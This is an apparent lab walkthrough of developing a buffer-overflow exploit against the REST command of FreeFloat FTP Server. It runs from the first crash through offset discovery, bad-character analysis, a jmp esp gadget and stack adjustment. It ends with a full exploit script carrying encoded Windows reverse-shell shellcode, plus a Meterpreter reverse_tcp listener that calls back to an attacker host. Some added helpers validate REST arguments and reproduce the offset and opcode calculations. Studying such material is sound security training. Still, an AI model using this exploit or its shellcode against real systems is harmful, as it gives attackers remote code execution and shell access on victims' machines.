FreeFloat FTP Server

Target: The Vulnerable

Trigger buffer overflow:

import sys
from socket import *

ip = "192.168.119.153"
port = 21

buf = "\x41" * 1000

print "[+] Connecting..."

s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()

print "[+] Done."
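From the defensive side, the crash is triggered by a REST argument that looks nothing like the decimal byte offset the command expects. This added Python 3 example (not from the original write-up) shows a server-side validator for REST arguments and a sensor-side check that flags malformed REST commands in captured control-channel lines; the sample lines are constructed here.

```python
import re

# Constructed sample of FTP control-channel lines, as a sensor or server log
# would record them (not taken from the original page).
SAMPLE_COMMANDS = [
    b"USER test\r\n",
    b"PASS test\r\n",
    b"REST 1024\r\n",                                    # legitimate resume offset
    b"REST " + b"A" * 1000 + b"\r\n",                    # the crash trigger above
    b"REST Aa0Aa1Aa2Aa3\r\n",                            # cyclic pattern probing
    b"REST " + b"\x81\xc4\xc0\xfd\xff\xff" + b"\r\n",    # raw opcodes as argument
]

REST_RE = re.compile(rb"^REST(?: (.*))?$", re.IGNORECASE)
MAX_REST_DIGITS = 20   # enough for any 64-bit byte offset

def validate_rest_argument(arg):
    """Server-side rule: a REST argument is a bounded string of decimal digits.
    Returns the offset as int, or None when the command must be rejected."""
    if arg is None or len(arg) > MAX_REST_DIGITS or not arg.isdigit():
        return None
    return int(arg)

def suspicious_rest_commands(lines):
    """Sensor-side rule: return (line_index, reasons) for every REST command
    whose argument fails validate_rest_argument()."""
    findings = []
    for i, raw in enumerate(lines):
        m = REST_RE.match(raw.rstrip(b"\r\n"))
        if m is None or validate_rest_argument(m.group(1)) is not None:
            continue
        arg = m.group(1)
        reasons = []
        if arg is None:
            reasons.append("missing argument")
        else:
            if len(arg) > MAX_REST_DIGITS:
                reasons.append("oversized argument (%d bytes)" % len(arg))
            if any(b < 0x20 or b > 0x7E for b in arg):
                reasons.append("non-printable bytes")
            elif not arg.isdigit():
                reasons.append("non-decimal argument")
        findings.append((i, reasons))
    return findings

if __name__ == "__main__":
    for index, reasons in suspicious_rest_commands(SAMPLE_COMMANDS):
        print("line %d: %s" % (index, ", ".join(reasons)))
```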

The result from Windows VM:

Restart Windows VM and Re-attach target!

Create pattern:

# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000 > /tmp/pattern

Find offset!

import sys
from socket import *

ip = "192.168.119.153"
port = 21

buf = open('/tmp/pattern','r').read()
print "[+] Connecting..."

s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()

print "[+] Done."

The result from Windows VM:

Register EIP contains 41326941.

Find exact offset!

# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 41326941
[*] Exact match at offset 246
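As an added example (not part of the original write-up), the following Python 3 code reproduces what pattern_create.rb and pattern_offset.rb do, so the offset of 246 can be checked without Metasploit: it generates the cyclic pattern and looks up the EIP value 41326941 as a little-endian x86 register value.

```python
import string
import struct

def cyclic_pattern(length):
    """Metasploit-style cyclic pattern: each 3-byte group is an uppercase letter,
    a lowercase letter and a digit, so every 4-byte window is unique within the
    first 20280 bytes (26 * 26 * 10 groups)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(pattern, query):
    """Locate `query` in `pattern`. `query` may be 4 raw characters or an
    8-hex-digit register value as the debugger shows it; x86 is little-endian,
    so the hex form is byte-reversed before searching. Returns -1 if absent."""
    if isinstance(query, bytes):
        query = query.decode("latin-1")
    if len(query) == 8 and all(c in string.hexdigits for c in query):
        needle = struct.pack("<I", int(query, 16))
    else:
        needle = query.encode("latin-1")
    return pattern.find(needle)

if __name__ == "__main__":
    pattern = cyclic_pattern(1000)   # same length as the crash buffer
    print("EIP 41326941 is at offset", pattern_offset(pattern, "41326941"))
```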

Using mona on Immunity Debugger:

  • Set working folder
    !mona config -set workingfolder c:\logs\%p

  • Find gadget jmp esp
    !mona jmp -r ESP

  • Generate bytearray
    !mona bytearray

Restart Windows VM and Re-attach target!

Find bad characters!

import sys
from socket import *

ip = "192.168.119.153"
port = 21

bytearray = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

bufsize = 1000
buf = 'A'*246 # EIP offset from findmsp
buf += 'BBBB' # EIP overwrite
buf += 'C'*8 # Add 8 additional bytes of padding to align the bytearray with ESP
buf += bytearray
buf += 'D'*(bufsize - len(buf))

print "[+] Connecting..."

s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()

print "[+] Done."

The result from Windows VM:

Finding bad chars:

!mona compare -f c:\logs\FTPServer\bytearray.bin -a 0x0230fc00 (the address currently held in ESP)

Remove bad chars:

!mona bytearray -cpb \x00\x0a\x0d

Restart Windows VM and Re-attach target!

Try Again!

import sys
from socket import *

ip = "192.168.119.153"
port = 21

bytearray = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22"
"\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42"
"\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62"
"\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82"
"\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2"
"\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2"
"\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

bufsize = 1000
buf = 'A'*246 # EIP offset from findmsp
buf += 'BBBB' # EIP overwrite
buf += 'C'*8 # Add 8 additional bytes of padding to align the bytearray with ESP
buf += bytearray
buf += 'D'*(bufsize - len(buf))

print "[+] Connecting..."

s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()

print "[+] Done."

The result from Windows VM:

Find a jmp esp gadget (opcodes \xff\xe4) in SHELL32.dll:

7c9e30d7
\xd7\x30\x9e\x7c (little-endian)

Open a listener:

# msfconsole
back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.119.151
set lport 443
set ExitOnSession false
exploit -j

We need to ensure that ESP is not pointing to the shellcode when the decoder routine is executed. We will do this by adding an instruction which will decrement ESP. To obtain the opcodes that represent the instruction, we will use another tool from the Metasploit Framework, ‘metasm_shell.rb’. Execute the following commands on Kali Linux:

cd /usr/share/metasploit-framework/tools/exploit/
./metasm_shell.rb

The ‘metasm_shell.rb’ script will give us an interactive prompt where we can enter CPU instructions and get the appropriate opcodes. Since we want to decrement ESP, we will try the following command:

metasm > sub esp,240h
"\x81\xec\x40\x02\x00\x00"

Uh oh, we’ve hit a snag. Notice that the opcode we got contains one of our bad characters (\x00). This would break our exploit. Let’s see if we can find another instruction that achieves the same result, ideally without bad characters in its opcodes. Instead of subtracting from ESP, let’s try adding a negative number to it and see what happens:

metasm > add esp,-240h
"\x81\xc4\xc0\xfd\xff\xff"
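The two opcode strings above can be reproduced and explained by hand. This added Python 3 example (not from the original write-up, and not metasm) encodes the imm32 forms of add/sub esp and checks the result against the bad characters found earlier, showing why the negative-add variant is usable and the sub variant is not.

```python
import struct

BAD_CHARS = b"\x00\x0a\x0d"   # bad characters found earlier in the write-up

# Opcode 0x81 is the "group 1" arithmetic form with a 32-bit immediate. The
# ModRM byte selects the operation in its reg field and the register in its rm
# field: mod=11 (register direct), rm=100 (ESP), reg=000 for ADD, reg=101 for SUB.
MODRM_ESP = {"add": 0xC4, "sub": 0xEC}

def encode_esp_adjust(op, imm):
    """Encode `add esp, imm` or `sub esp, imm` with a 32-bit immediate
    (little-endian, two's complement for negative values)."""
    if op not in MODRM_ESP:
        raise ValueError("unsupported operation: %s" % op)
    if not -0x80000000 <= imm <= 0xFFFFFFFF:
        raise ValueError("immediate does not fit in 32 bits")
    imm_bytes = struct.pack("<i", imm) if imm < 0 else struct.pack("<I", imm)
    return bytes([0x81, MODRM_ESP[op]]) + imm_bytes

def bad_chars_in(opcodes, bad=BAD_CHARS):
    """Return the sorted list of bad byte values present in an opcode string."""
    return sorted(set(opcodes) & set(bad))

def esp_adjust_candidates(amount):
    """Both ways to move ESP down by `amount`, each with its bad-character hits.
    A real assembler uses a shorter imm8 form for values below 0x80; this helper
    only covers the imm32 form that appears on this page."""
    sub_form = encode_esp_adjust("sub", amount)
    add_form = encode_esp_adjust("add", -amount)
    return {
        "sub esp,0x%x" % amount: (sub_form, bad_chars_in(sub_form)),
        "add esp,-0x%x" % amount: (add_form, bad_chars_in(add_form)),
    }

if __name__ == "__main__":
    for text, (opcodes, bad) in esp_adjust_candidates(0x240).items():
        print(text, opcodes.hex(), "bad chars:", bad if bad else "none")
```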

Put it all together:

import sys
from socket import *

ip = "192.168.119.155"
port = 21

# Windows reverse shell
buf =  ""
buf += "\xdb\xd0\xb8\x97\x29\x9b\x11\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x54\x83\xeb\xfc\x31\x43\x14\x03\x43\x83\xcb"
buf += "\x6e\xed\x43\x89\x91\x0e\x93\xee\x18\xeb\xa2\x2e\x7e"
buf += "\x7f\x94\x9e\xf4\x2d\x18\x54\x58\xc6\xab\x18\x75\xe9"
buf += "\x1c\x96\xa3\xc4\x9d\x8b\x90\x47\x1d\xd6\xc4\xa7\x1c"
buf += "\x19\x19\xa9\x59\x44\xd0\xfb\x32\x02\x47\xec\x37\x5e"
buf += "\x54\x87\x0b\x4e\xdc\x74\xdb\x71\xcd\x2a\x50\x28\xcd"
buf += "\xcd\xb5\x40\x44\xd6\xda\x6d\x1e\x6d\x28\x19\xa1\xa7"
buf += "\x61\xe2\x0e\x86\x4e\x11\x4e\xce\x68\xca\x25\x26\x8b"
buf += "\x77\x3e\xfd\xf6\xa3\xcb\xe6\x50\x27\x6b\xc3\x61\xe4"
buf += "\xea\x80\x6d\x41\x78\xce\x71\x54\xad\x64\x8d\xdd\x50"
buf += "\xab\x04\xa5\x76\x6f\x4d\x7d\x16\x36\x2b\xd0\x27\x28"
buf += "\x94\x8d\x8d\x22\x38\xd9\xbf\x68\x54\x2e\xf2\x92\xa4"
buf += "\x38\x85\xe1\x96\xe7\x3d\x6e\x9a\x60\x98\x69\xdd\x5a"
buf += "\x5c\xe5\x20\x65\x9d\x2f\xe6\x31\xcd\x47\xcf\x39\x86"
buf += "\x97\xf0\xef\x33\x92\x66\xd0\x6c\xd5\xe1\xb8\x6e\x1a"
buf += "\x0c\x82\xe6\xfc\x5e\xa4\xa8\x50\x1e\x14\x09\x01\xf6"
buf += "\x7e\x86\x7e\xe6\x80\x4c\x17\x8c\x6e\x39\x4f\x38\x16"
buf += "\x60\x1b\xd9\xd7\xbe\x61\xd9\x5c\x4b\x95\x97\x94\x3e"
buf += "\x85\xcf\xc4\xc0\x55\x0f\x6d\xc1\x3f\x0b\x27\x96\xd7"
buf += "\x11\x1e\xd0\x77\xea\x75\x62\x7f\x14\x08\x53\x0b\x22"
buf += "\x9e\xdb\x63\x4a\x4e\xdc\x73\x1c\x04\xdc\x1b\xf8\x7c"
buf += "\x8f\x3e\x07\xa9\xa3\x92\x9d\x52\x92\x47\x36\x3b\x18"
buf += "\xb1\x70\xe4\xe3\x94\x03\xe3\x1c\x6a\x21\x4c\x75\x94"
buf += "\x65\x6c\x85\xfe\x65\x3c\xed\xf5\x4a\xb3\xdd\xf6\x41"
buf += "\x9c\x75\x7c\x07\x6e\xe7\x81\x02\x2e\xb9\x82\xa0\xeb"
buf += "\xac\x0c\x47\x0c\xd1\xee\x74\xda\xe8\x84\xbd\xde\x4e"
buf += "\x96\xf4\x43\xe6\x3d\xf6\xd0\xf8\x17"
shellcode = buf

bufsize = 1000
eip = "\xd7\x30\x9e\x7c" # 0x7c9e30d7 - jmp esp [SHELL32.dll] (little-endian)
move_esp = "\x81\xc4\xc0\xfd\xff\xff" # add esp,-240h
buf = 'A'*246 # EIP offset from findmsp
buf += eip # EIP overwrite
buf += move_esp
buf += 'C'*8 # Add 8 additional bytes of padding to align the bytearray with ESP
buf += shellcode
buf += 'D'*(bufsize - len(buf))

print "[+] Connecting..."

s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()

print "[+] Done."

The result from Windows VM:

Reference
